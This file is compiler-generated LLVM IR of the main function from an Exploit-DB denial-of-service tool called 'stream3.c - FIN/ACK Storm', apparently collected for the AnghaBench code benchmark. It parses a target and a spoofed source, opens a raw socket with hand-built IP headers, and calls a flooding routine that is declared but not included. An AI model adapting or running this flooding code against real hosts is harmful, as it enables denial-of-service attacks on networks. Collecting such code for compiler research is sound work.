; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_21245.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_21245.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [57 x i8] c"stream3.c v0.1 - FIN/ACK Storm\0A 3APA3A@security.nnov.ru\0A\00", align 1
@dstaddr = common dso_local global i8* null, align 8
@dstport = common dso_local global i8* null, align 8
@srcaddr = common dso_local global i8* null, align 8
@srcport = common dso_local global i8* null, align 8
@PF_INET = common dso_local global i32 0, align 4
@SOCK_RAW = common dso_local global i32 0, align 4
@IPPROTO_RAW = common dso_local global i32 0, align 4
@sock = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [9 x i8] c"socket()\00", align 1
@IPPROTO_IP = common dso_local global i32 0, align 4
@IP_HDRINCL = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [13 x i8] c"setsockopt()\00", align 1
@.str.3 = private unnamed_addr constant [9 x i8] c"Starting\00", align 1
@stdout = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 1, i32* %6, align 4
  %7 = call i32 @printf(i8* getelementptr inbounds ([57 x i8], [57 x i8]* @.str, i64 0, i64 0))
  %8 = load i32, i32* %4, align 4
  %9 = icmp slt i32 %8, 1
  br i1 %9, label %10, label %12

10:                                               ; preds = %2
  %11 = call i32 @exit(i32 -3) #3
  unreachable

12:                                               ; preds = %2
  %13 = load i32, i32* %4, align 4
  %14 = icmp slt i32 %13, 3
  br i1 %14, label %18, label %15

15:                                               ; preds = %12
  %16 = load i32, i32* %4, align 4
  %17 = icmp sgt i32 %16, 5
  br i1 %17, label %18, label %23

18:                                               ; preds = %15, %12
  %19 = load i8**, i8*** %5, align 8
  %20 = getelementptr inbounds i8*, i8** %19, i64 0
  %21 = load i8*, i8** %20, align 8
  %22 = call i32 @usage(i8* %21)
  br label %23

23:                                               ; preds = %18, %15
  %24 = call i32 @time(i32* null)
  %25 = call i32 @srand(i32 %24)
  %26 = load i8**, i8*** %5, align 8
  %27 = getelementptr inbounds i8*, i8** %26, i64 1
  %28 = load i8*, i8** %27, align 8
  %29 = call i8* @lookup(i8* %28)
  store i8* %29, i8** @dstaddr, align 8
  %30 = load i8**, i8*** %5, align 8
  %31 = getelementptr inbounds i8*, i8** %30, i64 2
  %32 = load i8*, i8** %31, align 8
  %33 = call i8* @atoi(i8* %32)
  store i8* %33, i8** @dstport, align 8
  %34 = load i8*, i8** @dstaddr, align 8
  %35 = icmp ne i8* %34, null
  br i1 %35, label %36, label %39

36:                                               ; preds = %23
  %37 = load i8*, i8** @dstport, align 8
  %38 = icmp ne i8* %37, null
  br i1 %38, label %44, label %39

39:                                               ; preds = %36, %23
  %40 = load i8**, i8*** %5, align 8
  %41 = getelementptr inbounds i8*, i8** %40, i64 0
  %42 = load i8*, i8** %41, align 8
  %43 = call i32 @usage(i8* %42)
  br label %44

44:                                               ; preds = %39, %36
  %45 = load i32, i32* %4, align 4
  %46 = icmp sgt i32 %45, 3
  br i1 %46, label %47, label %52

47:                                               ; preds = %44
  %48 = load i8**, i8*** %5, align 8
  %49 = getelementptr inbounds i8*, i8** %48, i64 3
  %50 = load i8*, i8** %49, align 8
  %51 = call i8* @lookup(i8* %50)
  store i8* %51, i8** @srcaddr, align 8
  br label %52

52:                                               ; preds = %47, %44
  %53 = load i32, i32* %4, align 4
  %54 = icmp sgt i32 %53, 4
  br i1 %54, label %55, label %60

55:                                               ; preds = %52
  %56 = load i8**, i8*** %5, align 8
  %57 = getelementptr inbounds i8*, i8** %56, i64 4
  %58 = load i8*, i8** %57, align 8
  %59 = call i8* @atoi(i8* %58)
  store i8* %59, i8** @srcport, align 8
  br label %60

60:                                               ; preds = %55, %52
  %61 = load i32, i32* @PF_INET, align 4
  %62 = load i32, i32* @SOCK_RAW, align 4
  %63 = load i32, i32* @IPPROTO_RAW, align 4
  %64 = call i32 @socket(i32 %61, i32 %62, i32 %63)
  store i32 %64, i32* @sock, align 4
  %65 = icmp slt i32 %64, 0
  br i1 %65, label %66, label %69

66:                                               ; preds = %60
  %67 = call i32 @perror(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.1, i64 0, i64 0))
  %68 = call i32 @exit(i32 -1) #3
  unreachable

69:                                               ; preds = %60
  %70 = load i32, i32* @sock, align 4
  %71 = load i32, i32* @IPPROTO_IP, align 4
  %72 = load i32, i32* @IP_HDRINCL, align 4
  %73 = bitcast i32* %6 to i8*
  %74 = call i64 @setsockopt(i32 %70, i32 %71, i32 %72, i8* %73, i32 4)
  %75 = icmp slt i64 %74, 0
  br i1 %75, label %76, label %79

76:                                               ; preds = %69
  %77 = call i32 @perror(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.2, i64 0, i64 0))
  %78 = call i32 @exit(i32 -2) #3
  unreachable

79:                                               ; preds = %69
  %80 = call i32 @printf(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.3, i64 0, i64 0))
  %81 = load i32, i32* @stdout, align 4
  %82 = call i32 @fflush(i32 %81)
  %83 = call i32 (...) @flooder()
  ret i32 0
}

declare dso_local i32 @printf(i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @usage(i8*) #1

declare dso_local i32 @srand(i32) #1

declare dso_local i32 @time(i32*) #1

declare dso_local i8* @lookup(i8*) #1

declare dso_local i8* @atoi(i8*) #1

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @perror(i8*) #1

declare dso_local i64 @setsockopt(i32, i32, i32, i8*, i32) #1

declare dso_local i32 @fflush(i32) #1

declare dso_local i32 @flooder(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
